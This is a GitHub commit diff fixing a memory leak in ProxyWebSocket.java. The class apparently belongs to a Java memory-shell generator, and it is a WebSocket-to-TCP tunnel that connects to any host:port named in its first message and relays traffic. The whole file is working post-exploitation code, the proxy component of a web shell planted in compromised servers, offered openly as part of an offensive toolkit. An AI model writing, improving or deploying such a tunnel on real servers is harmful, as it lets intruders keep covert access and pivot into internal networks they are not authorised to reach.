Skip to content

Commit d0c9eec

Browse files
committed
fix: proxy OOM
1 parent e793d57 commit d0c9eec

File tree

1 file changed

+81
-57
lines changed

1 file changed

+81
-57
lines changed

generator/src/main/java/com/reajason/javaweb/memshell/shelltool/wsproxy/ProxyWebSocket.java

Lines changed: 81 additions & 57 deletions
Original file line numberDiff line numberDiff line change
@@ -4,12 +4,11 @@
44
import javax.websocket.EndpointConfig;
55
import javax.websocket.MessageHandler;
66
import javax.websocket.Session;
7-
import java.io.ByteArrayOutputStream;
7+
import javax.websocket.CloseReason;
88
import java.net.InetSocketAddress;
99
import java.nio.ByteBuffer;
1010
import java.nio.channels.AsynchronousSocketChannel;
1111
import java.nio.channels.CompletionHandler;
12-
import java.util.HashMap;
1312
import java.util.concurrent.Future;
1413
import java.util.concurrent.TimeUnit;
1514

@@ -21,89 +20,114 @@ public class ProxyWebSocket extends Endpoint implements MessageHandler.Whole<Byt
2120
private Session session;
2221
private long messageCount = 0;
2322
private AsynchronousSocketChannel currentClient = null;
24-
private final ByteBuffer buffer = ByteBuffer.allocate(102400);
25-
private ByteArrayOutputStream baos = new ByteArrayOutputStream();
26-
private final HashMap<String, AsynchronousSocketChannel> channelMap = new HashMap<>();
23+
private final ByteBuffer buffer = ByteBuffer.allocate(32768);
2724

2825
public ProxyWebSocket() {
2926
}
3027

31-
public void completed(Integer result, Session attachment) {
32-
buffer.clear();
33-
try {
34-
if (buffer.hasRemaining() && result >= 0) {
35-
byte[] arr = new byte[result];
36-
buffer.get(arr, 0, result);
37-
baos.write(arr, 0, result);
38-
ByteBuffer response = ByteBuffer.wrap(baos.toByteArray());
39-
if (attachment.isOpen()) {
40-
attachment.getBasicRemote().sendBinary(response);
41-
}
42-
baos = new ByteArrayOutputStream();
43-
readFromServer(attachment, currentClient);
44-
} else {
45-
if (result > 0) {
46-
byte[] arr = new byte[result];
47-
buffer.get(arr, 0, result);
48-
baos.write(arr, 0, result);
49-
readFromServer(attachment, currentClient);
50-
}
51-
}
52-
} catch (Exception ignored) {
53-
}
28+
@Override
29+
public void onOpen(Session session, EndpointConfig endpointConfig) {
30+
this.messageCount = 0;
31+
this.session = session;
32+
session.addMessageHandler(this);
5433
}
5534

56-
@Override
57-
public void failed(Throwable exc, Session attachment) {
58-
exc.printStackTrace();
35+
private void readFromServer() {
36+
if (currentClient != null && currentClient.isOpen() && session.isOpen()) {
37+
buffer.clear();
38+
currentClient.read(buffer, session, this);
39+
}
5940
}
6041

42+
@Override
6143
public void onMessage(ByteBuffer message) {
6244
try {
63-
message.clear();
6445
messageCount++;
6546
process(message, session);
66-
} catch (Exception ignored) {
47+
} catch (Exception e) {
48+
closeQuietly();
6749
}
6850
}
6951

70-
public void onOpen(Session session, EndpointConfig endpointConfig) {
71-
this.messageCount = 0;
72-
this.session = session;
73-
session.setMaxBinaryMessageBufferSize(1024 * 1024 * 1024);
74-
session.setMaxTextMessageBufferSize(1024 * 1024 * 1024);
75-
session.addMessageHandler(this);
76-
}
77-
78-
private void readFromServer(Session channel, AsynchronousSocketChannel client) {
79-
this.currentClient = client;
80-
buffer.clear();
81-
client.read(buffer, channel, this);
82-
}
83-
8452
private void process(ByteBuffer messageBuffer, Session channel) {
8553
try {
86-
if (messageCount > 1) {
87-
AsynchronousSocketChannel client = channelMap.get(channel.getId());
88-
client.write(messageBuffer).get();
89-
readFromServer(channel, client);
54+
if (messageCount > 1 && currentClient != null && currentClient.isOpen()) {
55+
currentClient.write(messageBuffer).get();
9056
} else if (messageCount == 1) {
91-
String values = new String(messageBuffer.array());
57+
byte[] bytes = new byte[messageBuffer.remaining()];
58+
messageBuffer.get(bytes);
59+
String values = new String(bytes);
60+
9261
String[] array = values.split(" ");
62+
if (array.length < 2) return;
9363
String[] addrArray = array[1].split(":");
94-
AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
64+
65+
currentClient = AsynchronousSocketChannel.open();
9566
int port = Integer.parseInt(addrArray[1]);
9667
InetSocketAddress hostAddress = new InetSocketAddress(addrArray[0], port);
97-
Future<Void> future = client.connect(hostAddress);
68+
69+
Future<Void> future = currentClient.connect(hostAddress);
9870
try {
9971
future.get(10, TimeUnit.SECONDS);
100-
} catch (Exception ignored) {
72+
} catch (Exception e) {
10173
channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
74+
closeQuietly();
10275
return;
10376
}
104-
channelMap.put(channel.getId(), client);
105-
readFromServer(channel, client);
10677
channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
78+
readFromServer();
79+
}
80+
} catch (Exception e) {
81+
closeQuietly();
82+
}
83+
}
84+
85+
86+
@Override
87+
public void completed(Integer result, Session attachment) {
88+
if (result == -1) {
89+
closeQuietly();
90+
return;
91+
}
92+
93+
try {
94+
if (result > 0) {
95+
buffer.flip();
96+
if (attachment.isOpen()) {
97+
attachment.getBasicRemote().sendBinary(buffer);
98+
}
99+
}
100+
readFromServer();
101+
} catch (Exception e) {
102+
closeQuietly();
103+
}
104+
}
105+
106+
@Override
107+
public void failed(Throwable exc, Session attachment) {
108+
closeQuietly();
109+
}
110+
111+
@Override
112+
public void onClose(Session session, CloseReason closeReason) {
113+
closeQuietly();
114+
}
115+
116+
@Override
117+
public void onError(Session session, Throwable thr) {
118+
closeQuietly();
119+
}
120+
121+
private void closeQuietly() {
122+
try {
123+
if (currentClient != null && currentClient.isOpen()) {
124+
currentClient.close();
125+
}
126+
} catch (Exception ignored) {
127+
}
128+
try {
129+
if (session != null && session.isOpen()) {
130+
session.close();
107131
}
108132
} catch (Exception ignored) {
109133
}

0 commit comments

Comments
 (0)